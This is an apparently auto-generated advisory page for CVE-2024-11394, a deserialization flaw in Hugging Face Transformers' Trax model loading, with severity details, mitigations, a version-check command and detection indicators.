CVE-2024-11394 – This vulnerability allows remote attackers to e... (How to Fix)

Q: What is the severity of CVE-2024-11394?

CVE-2024-11394 has a CVSS score of 8.8 (HIGH). This vulnerability allows remote attackers to execute arbitrary code by tricking users into loading malicious model files in Hugging Face Transformers. Attackers can achieve remote code execution in the context of the current user. Users of Hugging Face Transformers with Trax model support are affected.

📋 TL;DR

This vulnerability allows remote attackers to execute arbitrary code by tricking users into loading malicious model files in Hugging Face Transformers. Attackers can achieve remote code execution in the context of the current user. Users of Hugging Face Transformers with Trax model support are affected.

💻 Affected Systems

Products:

Hugging Face Transformers

Versions: Versions supporting Trax models prior to patched version

Operating Systems: All

Default Config Vulnerable: ⚠️ Yes

Notes: Requires user interaction to load malicious model files. Trax model support must be enabled.

📦 What is this software?

Transformers by Huggingface

View all CVEs affecting Transformers →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise with attacker gaining the same privileges as the user running the vulnerable application, potentially leading to data theft, ransomware deployment, or lateral movement.

🟠

Likely Case

Local privilege escalation or arbitrary code execution when users load untrusted model files from malicious sources.

🟢

If Mitigated

No impact if proper input validation and sandboxing are implemented, or if users only load trusted model files.

🌐 Internet-Facing: MEDIUM

🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

User interaction required (loading malicious file). Exploitation is straightforward once malicious model file is crafted.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Check Hugging Face security advisory for specific version

Vendor Advisory: https://huggingface.co/docs/transformers/security

Restart Required: No

Instructions:

1. Check current transformers version
2. Update to latest patched version via pip: pip install --upgrade transformers
3. Verify update completed successfully

🔧 Temporary Workarounds

Disable Trax model support

all

Prevent loading of Trax model files which are vulnerable to this deserialization issue

Configure application to reject Trax model files or disable Trax integration

Restrict model file sources

all

Only allow loading model files from trusted, verified sources

Implement allowlist of trusted model repositories

🧯 If You Can't Patch

Implement strict input validation for all model files
Run transformers in sandboxed/isolated environment with minimal privileges

🔍 How to Verify

Check if Vulnerable:

Check if using vulnerable version of transformers with Trax support enabled

Check Version:

python -c "import transformers; print(transformers.__version__)"

Verify Fix Applied:

Verify transformers version is updated to patched version and test loading known safe Trax models

📡 Detection & Monitoring

Log Indicators:

Unexpected process execution from transformers context
Errors or warnings during model loading/deserialization
Loading of model files from untrusted sources

Network Indicators:

Downloads of model files from unusual/untrusted sources
Outbound connections following model file loading

SIEM Query:

Process creation where parent process is python/transformers and command line contains suspicious arguments

📊 Metadata

CVE ID: CVE-2024-11394

CVSS v3 Score: 8.8 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE: CWE-502

Published: November 22, 2024

Last Updated: February 10, 2025

🔗 References

https://www.zerodayinitiative.com/advisories/ZDI-24-1515/ Third Party Advisory,VDB Entry

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-11394, you might also want to check these: